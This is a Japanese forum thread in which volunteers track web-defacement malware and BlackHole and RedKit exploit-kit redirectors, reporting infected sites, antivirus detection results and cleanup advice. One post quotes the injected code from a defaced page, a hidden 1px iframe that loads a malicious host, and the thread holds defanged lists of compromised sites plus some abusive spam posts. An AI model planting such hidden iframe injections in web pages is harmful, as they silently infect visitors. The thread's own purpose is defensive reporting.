【Gumblar/GENO】Web改竄ウイルス総合11【8080】
1 :
名無しさん@お腹いっぱい。 :
2012/08/14(火) 12:41:21.97 BE:4628902289-PLT(31018) 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
前スレ
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://kohada.2ch.net/test/read.cgi/sec/1279692828/
Gumblar(.x)、8080系ウイルス対処法。 行っておくべき事項を箇条書きにしました。 細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。 (1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする (2)Adobe Readerを最新版に更新する (3) Adobe ReaderのAcrobat JavaScriptを無効に設定 (4) JRE(Java Runtime Environment)を最新版に更新する (5) Flash Playerを最新版に更新する (6) QuickTimeを最新版に更新する (1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。 攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。 Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。 Acrobat JavaScriptを無効にする方法は以下の通り。 (1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択 (2)「分類」の中の「JavaScript」を選択 (3)「Acrobat JavaScriptを使用」のチェックをクリア (4)「OK」ボタンを押す ※サイトを運営されている方は、さらに次のことも実施していただきたい。 (1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する (2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、 ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨) ※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります ●InternetExplorer ツール→インターネットオプション→セキュリティ→ レベルのカスタマイズ→スクリプトのとこ全部無効にチェック ※ActiveXもOFF ●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す ●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す ●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→ デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す ●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション もしくはLunascape5を使うといいようです。 ●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
改竄を受けたら
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html (3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
>>8 WebGetterのドメインが変更になったもよう。
rd.or.tp → rd.or.tl
.
11 :
名無しさん@お腹いっぱい。 :2012/10/10(水) 16:24:17.14
そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね
天麩羅以外殆どレスがついてないな。平穏で何より。
さらみ復帰かきこ
「Adobe Reader」の「サンドボックス」を回避する脆弱性はなぜ危険か(トレンドマイクロ) scan.netsecurity.ne.jp/article/2012/11/28/30520.html >このエクスプロイトは、JavaScriptがソフトウェア上で無効になっている場合でも実行される。 >ユーザが必要とされる唯一のやりとりは、PDFファイルを開き、Webブラウザを閉じるだけで、 >それだけで脆弱性が悪用される。
「ITSOKNOPROBLEMBRO」 It's OK no problem bro. 「bro」って、なんじゃろ?
JPドメイン Web改竄速報 tp://izumino.jp/Security/def_jp.html
いろんなCMSがあるのね ぱっと見、Joomla! 1.5が多いなん 「Joomla!」ってのはLTSが2.5で、まいなうpだてJoomla! 2.5.8になってるね トップページにMETA HTTP-EQUIV="Refresh"〜仕込まれてるとこがあるる こりは故意にやってるのかどーかわかんね どーすべさ
>< ; > このメールにはご注意ください。送信者のアカウントが不正に使用されている可能性があるため、このメールは個人情報を騙し取ろうとする詐欺である可能性があります。 ぁぅぁぅぁー 検体8080を送ったら、ベンダーからの返信がみーんなこーなってた… って、ことは改竄サイトのホスティングにはつーほーめる届いてないかもん
RedKitリダイレクターけっこう多いよね (´ω`) RedKit設置されてるサーバー ぜんぶ正規のサイトだもんだからイヤラシイことこの上ない
ESET参戦
> Dear ○○,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> *********_ahhd.htm_i.txt - JS/Exploit.Agent.NEN trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
>
> Regards,
>
> ESET Malware Response Team
>>21 もうね、どーしよーもにゃー
検体送付とつーほーがワンセット サンセット イーセット
(-Д-) サムイネェ
>>20 > Hello,
>
> The files sent to us could be allocated to the following malware families:
>
> - EXP/Pidief.dtd
> - JS/Dldr.Agent.ahi
>
> The detections and repair routines of the malware samples will be available prospective with one of next update of the VDF.
>
> Best regards,
> Avira Sdn Bhd
うほ
>>20 のマカフィーが説明しているRedKitの中間Scriptが単純化したのを確認すた。。。しかも相対パスだぼ
現状、呼び出されるjar(exe)で検出されるのを待つしかにゃー
jar(exe)の進捗状況
Detection ratio: 6 / 45
Analysis date: 2013-03-14 12:13:28 UTC
↓
Detection ratio: 11 / 45
Analysis date: 2013-03-14 18:21:34 UTC
Analysis
Antivirus Result Update
DrWeb Trojan.DownLoader8.5817 20130314
Emsisoft Trojan.Win32.Agent.AMN (A) 20130314
Fortinet W32/Yakes.B!tr 20130314
Ikarus Trojan-Downloader.Win32.Karagany 20130314
Kaspersky UDS:DangerousObject.Multi.Generic 20130314
Malwarebytes Trojan.Agent.BVGen 20130314
McAfee PWS-FAQO!C7C63B63204E 20130314
Panda Suspicious file 20130314
TheHacker Posible_Worm32 20130314
TrendMicro PAK_Generic.001 20130314
TrendMicro-HouseCall TROJ_GEN.RC1H1CE 20130314
検出できないかもしれない中間Scriptとjar(exe)をメルで送れるベンダーに検体提出しました。
26 :
名無しさん@お腹いっぱい。 :2013/03/18(月) 12:58:33.77
国内Webサーバの大規模改ざん発生age
【社会】環境省サイトが改ざんされる…閲覧者がウイルス感染する危険も uni.2ch.net/test/read.cgi/newsplus/1363506806/ 環境省に聞いてみました 改ざんされてると分かったのはなぜ? ゼロデイ・ジャパン(0day.jp) | セキュリティ&マルウェア研究所 0day.jp/ ↑ ここで告知されていたからとのこと
■NSX GT-ONE GT-ROM.NET www●gt-rom●net/ >このサイトはコンピュータに損害を与える可能性があります。
>>24 EXEのダウンロードパスが固定数値からランダム数値に切り替わってるね
xxxx.htm
yyy.jar
??.html ← EXEが入手できん! (´ω`)
>>29 改竄されてて
最終的にCridexというマルウェアの感染となーる
ぅほっ
一日見ない間になんかすごいことに
>>25-28 リストが多くて挫折したのさ。。。orz....
>>29 アッー
>>30 やっぱランダムだたのね
>24以後、DLできなくなたー
決め打ちもできんくなたー
感染サイト一覧 unixfreaxjp.blogspot.jp/2013/03/ocjp-098-285blackhole-exploit-kit.html つまり、周知キャンペーンw
33 :
名無しさん@お腹いっぱい。 :2013/03/19(火) 18:48:05.28
<愛国者とネトウヨの11の違い> 理路整然と意見を話すのが愛国者 出所不明な怪文書を貼るのがネトウヨ 有識で周りの評価が高いのが愛国者 無職でプライドだけ高いのがネトウヨ 日本人である事を誇りに思うのが愛国者 日本人である事だけが誇りなのがネトウヨ 討論で相手の愛国度をはかるのが愛国者 討論で相手を売国奴扱いするのがネトウヨ 君が代をきちんと歌えるのが愛国者 気味が悪いほどネットで吠えるのがネトウヨ 家族思いなのが愛国者 家族の重荷になっているのがネトウヨ 社会に出て一人前なのが愛国者 2ちゃんねるでだけ一人前なのがネトウヨ 日本の歴史と政治に学が深いのが愛国者 2ちゃんの書き込みとレスが不快なのがネトウヨ 日本人が逮捕されると残念だと嘆くのが愛国者 日本人が逮捕されると通名だとわめくのがネトウヨ 日本の事を敬虔(けいけん)に思っているのが愛国者 自分の事を聖戦士だと思っているのがネトウヨ 投票で清き一票を入れるのが愛国者 妄想でキモい文章を作るのがネトウヨ
私は 一庶民 カスミソウの様に 密やかに
>29 VTで検出されるよーになたー 難読化されたScript BitDefender JS:Trojan.Crypt.MF F-Secure JS:Trojan.Crypt.MF GData JS:Trojan.Crypt.MF Ikarus Exploit.JS.Blacole MicroWorld-eScan JS:Trojan.Crypt.MF nProtect JS:Trojan.Crypt.MF 呼び先のphp Microsoft Exploit:JS/Blacole.GB Sophos Mal/ExpJS-N こっからさきは逝けんかった ESETとひげおぢさんからめる ESET JS/Kryptik.AII trojan JS/Kryptik.AIK trojan JS/Exploit.Agent.NEO trojan ひげおぢさん Trojan-Downloader.JS.DarDuk.lb CsideNet様から受領のお返事来てました。 VTとかが反応してきたので対応されるかと思ふぽ 頻繁に更新してるようですが ドメインがSPAM扱いされてるようになったみたいで、検体メルで送り辛い ><;
36 :
名無しさん@お腹いっぱい。 :2013/03/19(火) 23:16:40.31
あげ
あびらからもきてた>35 JS/Expy.B〜F
>>35 乙でし。
>Last-Modified: Tue, 19 Mar 2013 12:42:23 GMT
>Last-Modified: Tue, 19 Mar 2013 13:27:15 GMT
凄い勢いで更新?
※電話がボボンで代行依頼 orz ありがとう代行さん...
>>38 お疲れ様です
4種類ぐらいのScriptが繰り返し交互に変わっているようです
happy-lemon、apmsolucionesweb、speciaalaangepast、vedelaar
んでそれぞれさらに違うとこへ誘導
ipodのとこには古い8080が(ry
40 :
名無しさん@お腹いっぱい。 :2013/03/30(土) 14:13:02.89
ぼぼん解除てすt
>>24 のRedKitの中間Scriptが難読化した
現状まかひのみ対応
File type: HTML
Detection ratio: 2 / 46
McAfee Exploit-Rekit.f 20130402
McAfee-GW-Edition Exploit-Rekit.f 20130402
Exploit Kit が設置されてたはずのサイトへ逝ってみた トップページには > Hacked By CompLeXx* & XIX ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
BlackHole Exploit Kit Redirectorだと思うけど ランダムにExploit Kitサイトや金融系っぽいサイトに飛ばされるので新手のフィッシングかと思ってたら 自分でも知ってるbloombergにも逝っちゃた どうやらノーマルなサイトと混ぜて飛ばされるみたい 金融系の末尾あたりに付く「LBTG」ってなんじゃろか? 株価チャートのことかなん
>>45 の亜種
ひげおぢさんから自動お返事の件名「[!!Spam KSE]Re: 〜」
途中誘導されてるとこの一つのアドレスが薬物(Viagra等)販売サイトなのでこーなった…
他のベンダーに届いているのか心配
>>45 との共通点
:タグの文字列
:難読Script デコードめんどいからaguse最高(´∇`) gredでも確認でけるYO
:誘導先に金融系サイトが混ざっている模様。恐らく検出逃れかと
>>45 BitDefender Trojan.JS.Iframe.DDE 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
>>47 Antivirus Result Update
BitDefender Trojan.JS.Iframe.DDE 20130415
DrWeb JS.IFrame.418 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
Ikarus Trojan.JS.IFrame 20130415
Microsoft Trojan:JS/BlacoleRef.DD 20130415
MicroWorld-eScan Trojan.JS.Iframe.DDE 20130415
nProtect Trojan.JS.Iframe.DDE 20130415
TrendMicro-HouseCall TROJ_GEN.F47V0415 20130415
これくらい検出されれば、改竄されたことに気付くかなん
>>46 BitDefender Trojan.Script.CDK 20130416
Commtouch JS/IFrame.RS 20130416
DrWeb JS.IFrame.418 20130416
Emsisoft Trojan.Script.CDK (B) 20130416
F-Prot JS/IFrame.RS 20130416
F-Secure Trojan.Script.CDK 20130416
GData Trojan.Script.CDK 20130416
Microsoft Trojan:JS/BlacoleRef.CZ 20130416
MicroWorld-eScan Trojan.Script.CDK 20130416
nProtect Trojan.Script.CDK 20130416
Sophos Mal/Iframe-AO 20130416
TrendMicro-HouseCall TROJ_GEN.F47V0414 20130416
>>49 Avira
JS/Iframe.CI
HTML/Iframe.CN
JS/Iframe.CL
>>45 また変わった
パパンがパンデミック
DrWeb JS.IFrame.418 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
中間Script
McAfee Exploit-Rekit.f 20130416
Norman RedKit.B 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
BlackHoleもRedKitも同じ中間Scriptになったのかな? > Norman
>>52 増えた
BitDefender Trojan.JS.Agent.IYS 20130417
Commtouch JS/IFrame.RS.gen 20130417
DrWeb JS.IFrame.418 20130417
Emsisoft Trojan.JS.Agent.IYS (B) 20130417
F-Prot JS/IFrame.RS.gen 20130417
F-Secure Trojan.JS.Agent.IYS 20130417
GData Trojan.JS.Agent.IYS 20130417
Ikarus Trojan.JS.BlacoleRef 20130417
McAfee JS/Blacole-Redirect.aa 20130417
Microsoft Trojan:JS/BlacoleRef.DD 20130417
MicroWorld-eScan Trojan.JS.Agent.IYS 20130417
Norman Blacole.TB 20130417
nProtect Trojan.JS.Agent.IYS 20130417
TrendMicro-HouseCall TROJ_GEN.F47V0416 20130417
確認できてから三度改竄されてるけど
どんなセキュリティソフト使ってんだろ?
Fxやちょろめ、ぐぐるを使わないんだろか?
孫やほーだと警告でにゃーし
とっくの昔に直接めるしてるし
NTTPCコミュニケーションズからも通達されてるはずなんだけど。。。
ドメインがスパムとかに登録されちゃってるのかな?
Wab上での機会損失関係ない企業なぬか?
ついったーやってるっぽいんだけどにゃー
ひょっとして蜜壷?
>>53 四度目
AntiVir JS/BlacoleRef.CZ.7 20130418
Commtouch JS/IFrame.RS.gen 20130418
DrWeb JS.IFrame.418 20130418
F-Prot JS/IFrame.RS.gen 20130418
Ikarus Trojan.JS.IFrame 20130418
McAfee JS/Blacole-Redirect.aa 20130418
Microsoft Trojan:JS/BlacoleRef.DD 20130418
Norman Blacole.TB 20130417
つーほーめる届いてなくても
いーかげん気付かないかなん
>>54 五度目
AntiVir JS/BlacoleRef.CZ.7 20130419
BitDefender Trojan.Script.CDS 20130419
Commtouch JS/IFrame.RS.gen 20130419
DrWeb JS.IFrame.418 20130419
Emsisoft Trojan.Script.CDS (B) 20130419
F-Prot JS/IFrame.RS.gen 20130418
F-Secure Trojan.Script.CDS 20130419
GData Trojan.Script.CDS 20130419
Ikarus Trojan.JS.IFrame 20130419
McAfee JS/Blacole-Redirect.aa 20130419
McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419
Microsoft Trojan:JS/BlacoleRef.DD 20130419
MicroWorld-eScan Trojan.Script.CDS 20130419
Norman Blacole.TB 20130419
nProtect Trojan.Script.CDS 20130419
もうベンダーに送る気力がにゃい
こりもころころ変わるっぽい>中間Script Sophos Troj/ExpJS-II 20130419 55ひっくるめて送った>ベンダー
>>55 七度目
Detection ratio: 2 / 46
Analysis date: 2013-04-21 16:31:34 UTC
Antivirus Result Update
McAfee JS/Exploit-Blacole.ht 20130421
Norman Blacole.TH 20130421
六度目は
>>47 >>49 とおなじものですた
中間Script
>>57 久しぶりにひげおじさん登場
Detection ratio: 18 / 46
Analysis date: 2013-04-21 17:25:00 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.7 20130421
BitDefender Trojan.JS.Agent.IYT 20130421
Commtouch JS/IFrame.RS.gen 20130420
Comodo UnclassifiedMalware 20130421
DrWeb JS.IFrame.418 20130421
Emsisoft Trojan.JS.Agent.IYT (B) 20130421
F-Prot JS/IFrame.RS.gen 20130420
F-Secure Trojan.JS.Agent.IYT 20130421
Fortinet JS/Agent.GWA!tr.dldr 20130421
GData Trojan.JS.Agent.IYT 20130421
Ikarus Trojan.JS.IFrame 20130421
Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421
McAfee JS/Exploit-Blacole.eu 20130421
McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421
Microsoft Trojan:JS/BlacoleRef.DD 20130421
Norman Blacole.TB 20130421
nProtect Trojan.JS.Agent.IYT 20130421
TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421
単純化しちゃったのがまた出た
Detection ratio: 0 / 46
Analysis date: 2013-04-21 17:15:56 UTC
ねもい
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \ スパムとかのドメインがあったもより まかひには送れない
>>57 八回目…
Detection ratio: 6 / 46
Analysis date: 2013-04-23 04:15:16 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.8 20130423
DrWeb Exploit.BlackHole.182 20130423
McAfee JS/Exploit-Blacole.ht 20130423
NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423
Norman Blacole.TH 20130422
VIPRE Trojan.JS.Obfuscator.aa (v) 20130423
> Dear *****, > > Thank you for your submission. > The detection for this threat will be included in our next signature update. > > Regards, > > ESET Malware Response Team いつもごめんよぉー 肝心の大ボス捕まえられなくて
これまで蜜壷状態だったとこが正常になった模様です。 お疲れ様でした。 定点観測おはり
こんな夜中にGMOの中の人が受理してくれました>インシデント ゴールデンなウィークですがお疲れ様です。 ありがとうございます。 この場を借りてお礼申し上げます。
一回目 AntiVir JS/BlacoleRef.CZ.12 20130503 Avast JS:Decode-ADH [Trj] 20130504 GData JS:Decode-ADH 20130504 McAfee JS/Exploit-Blacole.ht 20130504 McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504 二回目 AntiVir JS/BlacoleRef.CZ.12 20130504 Avast JS:Decode-ADH [Trj] 20130504 BitDefender Trojan.JS.Iframe.DDQ 20130504 Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504 F-Secure Trojan.JS.Iframe.DDQ 20130504 GData Trojan.JS.Iframe.DDQ 20130504 McAfee JS/Exploit-Blacole.ht 20130504 McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504 MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504 nProtect Trojan.JS.Iframe.DDQ 20130504 三回目 McAfee JS/Exploit-Blacole.ht 20130505 McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504 Script更新して殆どのベンダー半日もたんかった てーてんかんそくなぬか サイトの対応は早くても明後日、火曜日以降になるんだろーな
>>64 > 三回目
増えた
BitDefender Trojan.JS.Iframe.DDT 20130505
Comodo UnclassifiedMalware 20130505
Emsisoft Trojan.JS.Iframe.DDT (B) 20130505
F-Secure Trojan.JS.Iframe.DDT 20130505
GData Trojan.JS.Iframe.DDT 20130505
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505
MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505
nProtect Trojan.JS.Iframe.DDT 20130505
TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505
覚音山 西徳寺 www●saitoku●net/ iframe name=Twitter scrolling=auto・・・ 競馬の予想屋 keibaky●com <!--c3284d--><script>try{1-prototype;}catch・・・ two2readblog●com >不正なソフトウェアには 550 trojan(s) など wwwwwwww
上二つGMO、ばりゅどめにつーほー
別件ばぅぁー
ひげおぢさん
> Hello,
>
> New malicious software was found in the attached file. Its detection will be included in the next update.
>
> All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg
>
> Thank you for your help.
>>64-65 なおた ヽ(´ー`)ノ
RedKit Exploit Kit Redirector Site 某所のJSファイル AntiVir HTML/TwitScroll.B 20130508 Avast JS:Iframe-AML [Trj] 20130508 AVG HTML/Framer 20130508 BitDefender Trojan.Iframe.CBN 20130508 Commtouch IFrame.gen 20130508 Comodo TrojWare.JS.Iframe.FK 20130508 Emsisoft Trojan.Iframe.CBN (B) 20130508 ESET-NOD32 JS/Iframe.HH 20130508 F-Prot IFrame.gen 20130508 F-Secure Trojan.Iframe.CBN 20130508 Fortinet JS/Iframe.HH!tr 20130508 GData Trojan.Iframe.CBN 20130508 Ikarus Exploit.HTML.IframeRef 20130508 Kaspersky HEUR:Trojan.Script.Generic 20130508 McAfee JS/IFrame.gen.j 20130508 McAfee-GW-Edition JS/IFrame.gen.j 20130508 Microsoft Exploit:HTML/IframeRef.DM 20130508 MicroWorld-eScan Trojan.Iframe.CBN 20130508 NANO-Antivirus Trojan.Html.TwitScroll.bklyhq 20130508 Norman Iframe.UW 20130508 nProtect Trojan.Iframe.CBN 20130508 PCTools Trojan.Webkit 20130508 Sophos Troj/Iframe-JG 20130508 Symantec Trojan.Webkit!html 20130508 VIPRE Malware.JS.Generic (JS) 20130508 おしんさん、がむばって
改竄サイトをホスティングにつーほーしてるなまかへ ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね
BlackHole Exploit Kit Redirector Siteの新種のScript File type: HTML Detection ratio: 1 / 46 Analysis date: 2013-05-11 18:18:17 UTC Antivirus Result Update Norman BlacoleRef.BA 20130511 んで、飛び先のひとつ File type: HTML Detection ratio: 6 / 46 Analysis date: 2013-05-11 18:39:21 UTC Antivirus Result Update BitDefender Trojan.Html.Fakealert.P 20130511 Emsisoft Trojan.Html.Fakealert.P (B) 20130511 F-Secure Trojan.Html.Fakealert.P 20130511 GData Trojan.Html.Fakealert.P 20130511 MicroWorld-eScan Trojan.Html.Fakealert.P 20130511 nProtect Trojan.Html.Fakealert.P 20130510 ESETもどきに連れてかれたん
72 :
名無しさん@お腹いっぱい。 :2013/05/14(火) 15:02:24.37
apple-hikkoshi●co●jp/ 403、404が改竄されとるんw ishigo●sytes●net ※電凸済み
>>72 コード
<!-- . --><iframe width="1px" height="1px" src="http://ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ></iframe><!-- . -->
74 :
名無しさん@お腹いっぱい。 :2013/05/14(火) 17:50:17.38
お疲れ様です。 某公益社団法人のサイトがやられていますた。>BlackHole Exploit Kit おしんにめる済み
kusuo-o●net ど う し て こ う な っ た ? c o m m o n / j s / s c r i p t . j s
77 :
名無しさん@お腹いっぱい。 :2013/05/15(水) 00:20:03.95
gakunavi●net
>>76-77 どーん
>76
>>75 と同じBlackHole Exploit Kit Redirector
ユーザーへのメールは届かなかったみたい。
toやccが多いと不通になるようです。。。
>77
2013-05-07 08:28:11 UTC (日本時間 : 2013/5/07 17:28:11)にはVirusTotalに投げられてますた。
あきた寝る
210●148●117●65/ 色々な意味でスゲェw
>>76 の件
ミンスから返信
・鯖業者と相談して対応
・JPCERTにはミンス(党本部)から連絡済
とのこと。
kusuo-o●net
>ただいまメンテナンス中です。
>後日公開させていただきます。
見に行ったらメンテ中だた...
>>80 逆引きもぁぅぁぅぁー
きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz......
上流のIIJにつーほー
>>81 他のページやjsは生きてるお フミダイかも
再要請すた。
84 :
名無しさん@お腹いっぱい。 :2013/05/16(木) 00:23:25.72
コテ忘れるし、sageてないし… orz
>>76 さくら対応
>>80 御本人様から対応のお返事頂きました
以上確認しました。
皆様お疲れ様です。 m(_ _)m
BlackHole Exploit Kit Redirector 検体2通、いくつか宛先不通になってた 1通目は、薬物(Viagra等)販売サイトのドメインがあったので 同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz........... 薬物販売サイトにも罠があるっぽい File size:[TAB]50.3 KB ( 51517 bytes ) File type:[TAB]HTML Detection ratio:[TAB] 2 / 47 Analysis date:[TAB] 2013-05-22 16:21:42 UTC Antivirus [TAB] Result [TAB] Update Avast [TAB] HTML:Script-inf [TAB] 20130522 GData [TAB] HTML:Script-inf [TAB] 20130522
JaneViewの設定だお>[TAB] >87やりなおし File size: 50.3 KB ( 51517 bytes ) File name: pl.txt File type: HTML Detection ratio: 2 / 47 Analysis date: 2013-05-22 16:21:42 UTC Antivirus Result Update Avast HTML:Script-inf 20130522 GData HTML:Script-inf 20130522 んで感染サイトのスクリプトは File size: 8.4 KB ( 8624 bytes ) File name: index.html File type: HTML Detection ratio: 4 / 47 Analysis date: 2013-05-22 15:50:35 UTC Antivirus Result Update Fortinet JS/Iframe.DDG!tr.dldr 20130522 Kaspersky Trojan-Downloader.JS.Iframe.ddr 20130522 McAfee JS/Exploit-Blacole.ht 20130522 NANO-Antivirus Trojan.Script.Expack.bqgmvl 中間スクリプト File size: 241 bytes ( 241 bytes ) File type: HTML Detection ratio: 2 / 47 Analysis date: 2013-05-22 16:12:15 UTC Antivirus Result Update McAfee Exploit-Rekit.f 20130522 Sophos Troj/ExpJS-II 20130522
RedKit Exploit Kit Redirector ランダムな中間スクリプト File type: HTML Detection ratio: 3 / 47 Analysis date: 2013-05-26 14:39:38 UTC McAfee JS/Exploit-Blacole.lt 20130526 McAfee-GW-Edition JS/Exploit-Blacole.lt 20130526 Sophos Troj/ExpJS-II 20130522 まかひとそふぉぉぉぉすががむばってるん 相変わらずこちらの環境ではブツ落とせないままぽ
www●muse●dti●ne●jp/~ohyes/
>>93 お疲れ様です。
夢列車につーほーしますた。
まだ直ってないようですが、
恐らくひげおぢさんがピコーンしたら対応されるかも>93
んで関連
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/
コメントしてる人やベンダーを責められないと思ふ
ひょっとして
>>15 なぬかようか
97 :
名無しさん@お腹いっぱい。 :2013/06/02(日) 11:58:43.02
www●trajal●net/k-b●html www●f-airline●com/ lukes-world●co●jp/ www2●patt●gr●jp/~ryo/
98 :
名無しさん@お腹いっぱい。 :2013/06/02(日) 12:18:40.44
松浦とみよし 市議会議員 www4●ocn●ne●jp/~tomiyosi/ 連絡したのにこの状態。。。
>>97-98 お疲れ様です。
つーほーしました。
以前にもつーほーしたのがあったやうな
つーほー漏れかなん。。。orz...........
100 :
名無しさん@お腹いっぱい。 :2013/06/04(火) 23:11:04.06
申告しても対処しないサイト www●yanagita-kk●co●jp/ www10●ocn●ne●jp/~kuushuu/ussbsindex●html www●arpak-cdc●co●jp/ w01●tp1●jp/~a541677231/ nanaplan●jp/kako_kenngakusai●html ir06●com/ www●garage-yamato●com/ www●fp-kazuna●com/insu/ www1●hinocatv●ne●jp/baba/ harakirievent●toypark●in/
101 :
名無しさん@お腹いっぱい。 :2013/06/04(火) 23:13:15.28
archivo-semiotica●com/ www●dorf●co●jp/access●html www●utsunomiya-es●com/ mado-works●com/staff●html www●86919●com/ xn--n8jxcwb2fra8229bokzg●com/ angelstone●co●jp/ bbs-beppin●com www●presen●co●jp/SERV●html harmony8●com g2g2●jp/ caiquesarepeopletoo●com/ cairo123●com/ www●antwarp●jp/souvenir/monthly_select/
>>102 >>102 Cまで済
尚、Cに関しては、HI BIT 経由の情報として
警視庁サイバー犯罪対策課がHPの所有者に連絡済とのこと
>>103 残権に関しては、警視庁のお手並み拝見ということで撤収
105 :
名無しさん@お腹いっぱい。 :2013/06/06(木) 21:11:02.86
何ヶ月も放置する駄目なOCNのユーザが大量感染 OCNはあてにならないので直接ユーザのメルアドに警告中。 メルアドがないのを助けてください www1●ocn●ne●jp/~ganja/ www1●ocn●ne●jp/~oohata/ www1●ocn●ne●jp/~takano8/ www11●ocn●ne●jp/~uten/ www12●ocn●ne●jp/~kaido/rw/
106 :
名無しさん@お腹いっぱい。 :2013/06/06(木) 21:33:28.35
www14●ocn●ne●jp/~yu4127/ www15●ocn●ne●jp/~nakanoah/ www15●ocn●ne●jp/~toshikaz/ www15●ocn●ne●jp/~vento/ www17●ocn●ne●jp/~skynet/ www18●ocn●ne●jp/~answer/ www18●ocn●ne●jp/~cos/
107 :
名無しさん@お腹いっぱい。 :2013/06/06(木) 23:26:08.97
40件はHPのメルアドに警告完了 wwww2●ocn●ne●jp/~esi/ www18●ocn●ne●jp/~myouga/ www2●ocn●ne●jp/~littleb/ www2●ocn●ne●jp/~seafood/ www2●ocn●ne●jp/~skbld/ www2●ocn●ne●jp/~suwan/ www3●ocn●ne●jp/~charinko/ www3●ocn●ne●jp/~nino38/
108 :
名無しさん@お腹いっぱい。 :2013/06/06(木) 23:30:15.76
